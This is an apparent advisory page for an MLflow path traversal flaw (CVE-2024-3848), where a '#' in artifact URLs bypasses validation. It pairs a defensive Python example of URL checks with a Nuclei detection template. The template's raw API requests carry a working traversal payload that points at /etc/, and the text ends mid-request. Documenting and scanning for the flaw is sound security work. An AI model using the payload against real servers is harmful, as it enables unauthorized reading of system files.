Path Traversal Bypass in Artifact Retrieval
A vulnerability in MLflow version 2.11.0 allows path traversal due to improper validation of artifact URLs. By appending a '#' to the URL, attackers can bypass security checks and read arbitrary files. This issue was patched in version 2.12.1.
Available publicly on Apr 26 2024 | Available with Premium on Apr 17 2024
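Why a path-only check misses the '#' form described above, as an added Python example (not MLflow's code or its patch, and not part of the original advisory). The function names, the host artifacts.example and the sample locations are constructed for illustration.

```python
from urllib.parse import urlsplit, unquote


def naive_is_safe(location: str) -> bool:
    """Weak check (hypothetical): looks for '..' only in the parsed path."""
    return ".." not in urlsplit(location).path.split("/")


def strict_is_safe(location: str) -> bool:
    """Hardened check (hypothetical): no component may hide path segments."""
    parts = urlsplit(location)
    # Everything after '#' or '?' is parsed out of .path, so a path-only
    # check never sees it. An artifact location needs neither.
    if "#" in location or "?" in location or parts.fragment or parts.query:
        return False
    # A remote scheme with an empty host (e.g. "http:///...") is malformed.
    if parts.scheme in ("http", "https") and not parts.netloc:
        return False
    # Decode until stable so %2e%2e and double-encoded forms are visible.
    path = parts.path
    for _ in range(4):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return False  # still changing after 4 rounds: refuse
    return ".." not in path.replace("\\", "/").split("/")


# Constructed sample locations; the first has the shape used on this page.
SAMPLES = [
    "http:///#/../../../etc/",
    "http://artifacts.example/models/run1",
    "http://artifacts.example/a/../../etc",
    "http://artifacts.example/a/%2e%2e/etc",
]


def audit(locations):
    """Return {location: (naive_verdict, strict_verdict)}."""
    return {loc: (naive_is_safe(loc), strict_is_safe(loc)) for loc in locations}


if __name__ == "__main__":
    for loc, (naive, strict) in audit(SAMPLES).items():
        print(f"naive={naive!s:5} strict={strict!s:5} {loc}")
```

For the first sample the parser reports a path of "/" and puts the traversal sequence in the fragment, which is why the weak check accepts it.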
Nuclei Template
id: mlflow-lfi-hash-bypass
info:
  name: MLFlow LFI via model registration API with hash bypass
  author: asimovl, byt3bl33d3r, DanMcInerney
  severity: high
  description: MLflow local file include via hash bypass in model registration API.
  reference:
    - https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-3848
    cwe-id: CWE-29
  tags: mlflow,ml,ai,cve,huntr,lfi,protectai
variables:
  experiment_name: "{{rand_text_alpha(6)}}"
http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{experiment_name}}", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}
      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{exid}}"}
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{experiment_name}}"}
      - |
        POST /ajax-api/2.0/mlflow/mode